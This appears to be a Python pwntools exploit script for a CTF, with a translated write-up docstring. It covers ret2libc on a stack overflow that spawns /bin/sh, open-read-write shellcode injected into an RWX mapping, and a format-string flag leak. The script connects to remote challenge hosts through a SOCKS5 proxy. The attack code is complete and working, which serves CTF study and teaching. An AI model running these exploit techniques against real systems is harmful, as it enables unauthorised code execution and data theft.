
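#!/usr/bin/env python3
"""CTF pwn writeup, three challenges (notes translated from the original Chinese).

Challenge 1 (menu program, ret2libc -- ``exploit_ret2libc``)
    Looking at it in IDA it is an ordinary menu program. The first comparison is
    against the characters '1'..'4', so the menu choice is read as a character.
    Option 2 has a stack overflow, so a plain ret2libc is enough.

Challenge 2 ("async escape", RWX mmap + shellcode -- ``exploit_mmap_shellcode``)
    IDA does not recognise the call, but from the assembly it is equivalent to
    ``mmap64(0, 0x2000, 7, 0x22, 0xffffffff, 0)``: a 0x2000-byte mapping that is
    readable, writable and executable (the third argument, prot, is 7). The rest
    is simple: the program copies our input into that mapping (``v4`` in IDA) and
    jumps to it with no filtering. The sandbox allows open/read/write, so
    shellcraft-generated ORW shellcode is sufficient.

Challenge 3 (format string, no script in this writeup)
    The earlier parts are not interesting; go straight to the bug. The flag is
    first written onto the stack, and the member "points" field is later used as
    a format string. ``%p`` leaks stack contents; converting the leaked words
    from big-endian to little-endian and from hex to text (CyberChef works)
    recovers the flag. Only the first segment is demonstrated; although this one
    is a web challenge the vulnerability is the same. Reading ``%8$p`` through
    ``%13$p`` is enough.

Environment:
    The original script carried the SOCKS5 proxy username and password inline.
    They are read from the environment here (``PROXY_USER`` / ``PROXY_PASS`` are
    variable names chosen for this rewrite) so the credentials are not kept in
    source.
"""
from pwn import *
import os
import socket
import sys

import socks

context.log_level = 'debug'
context.arch = 'amd64'

# Challenge binary; the libc is loaded only by the exploit that needs it.
elf = ELF('./pwn')
li = './libc.so.6'

# 1: attack the remote instance through the proxy, 0: run ./pwn locally.
REMOTE = 1

# SOCKS5 proxy in front of the remote instance (host/port as in the writeup).
PROXY_HOST = '81.dart.ccsssc.com'
PROXY_PORT = 25790
REMOTE_HOST = 'xt.xl-lab.top'

# The tube all shorthands below operate on; set by connect().
p = None


def connect(port):
    """Open a tube to the remote instance on *port*, or to a local ./pwn process.

    When REMOTE is set, all sockets are routed through the SOCKS5 proxy; proxy
    credentials come from the environment (see module docstring).
    """
    if REMOTE:
        socks.set_default_proxy(
            socks.SOCKS5, PROXY_HOST, PROXY_PORT,
            username=os.environ.get('PROXY_USER'),
            password=os.environ.get('PROXY_PASS'),
            rdns=True,
        )
        socket.socket = socks.socksocket
        return remote(REMOTE_HOST, port)
    return process('./pwn')


# Shorthands over the global tube `p` (kept from the original toolbox).
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
slr = lambda s: p.sendline(str(s))
sd = lambda s: p.send(s)
sdr = lambda s: p.send(str(s))
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
rcl = lambda: p.recvline()
leak = lambda name, addr: log.success(name + '---' + hex(addr))
# Read `a` bytes and unpack them as a little-endian u64. The original also
# called .strip() after the zero-padding; that can only shorten the buffer
# below 8 bytes (u64 then raises) or do nothing, so it is dropped.
u6 = lambda a: u64(rc(a).ljust(8, b'\x00'))
i6 = lambda a: int(a, 16)


def csu():
    """Return p64(0)+p64(0)+p64(1), a prefix the original kept for a csu-style chain (unused here)."""
    return p64(0) + p64(0) + p64(1)


def ph(s):
    """Print an integer in hex."""
    print(hex(s))


def dbg():
    """Attach gdb to the current tube and pause (local debugging only)."""
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)
    # maybe: gdbscript='set debug-file-directory ./star'
    pause()


# Addresses from the (non-PIE) challenge binary, named as in the writeup.
RDI = 0x40129a    # "rdi" gadget (presumably pop rdi ; ret -- confirm in the binary)
BACK = 0x40136F   # address returned to after the leak so the overflow can be hit again
RET = 0x401410    # lone ret used in front of system() (presumably for stack alignment)
PAD = 0x58        # bytes of filler before the saved return address


def exploit_ret2libc():
    """Challenge 1: leak puts via the stack overflow in option 2, then system("/bin/sh").

    Stage 1 overflows with puts(puts@got) and returns to BACK; stage 2 reuses
    the overflow for system(binsh) with the leaked libc base.
    """
    global p
    libc = ELF(li)
    p = connect(33662)
    pu = elf.sym['puts']
    puts_got = elf.got['puts']

    sdr(2)
    pay = PAD * b'b' + flat(RDI, puts_got, pu, BACK)
    sd(pay)
    # Skip the program's green "send complete" banner before reading the leak.
    ru(b'\x1B[32m' + '发送完毕。'.encode() + b'\x1B[0m\n')
    libcbase = u6(6) - libc.sym['puts']
    sy = libcbase + libc.sym['system']
    binsh = libcbase + next(libc.search(b'/bin/sh'))

    pay = PAD * b'b' + flat(RET, RDI, binsh, sy)
    sd(pay)
    ph(libcbase)
    ti()


def exploit_mmap_shellcode():
    """Challenge 2: send ORW shellcode; the program copies it into an RWX mapping and jumps to it.

    0x4AD2BC is the scratch buffer address used by the writeup for the file
    contents (presumably a writable address inside the binary -- confirm).
    """
    global p
    p = connect(33583)
    pay = asm(shellcraft.open(b'./flag', 0))
    pay += asm(shellcraft.read(3, 0x4AD2BC, 0x100))
    pay += asm(shellcraft.write(1, 0x4AD2BC, 0x100))
    sd(pay)
    ti()


if __name__ == '__main__':
    # Select the exploit by name: ./exp.py ret2libc | shellcode (default: ret2libc).
    _EXPLOITS = {'ret2libc': exploit_ret2libc, 'shellcode': exploit_mmap_shellcode}
    which = sys.argv[1] if len(sys.argv) > 1 else 'ret2libc'
    _EXPLOITS[which]()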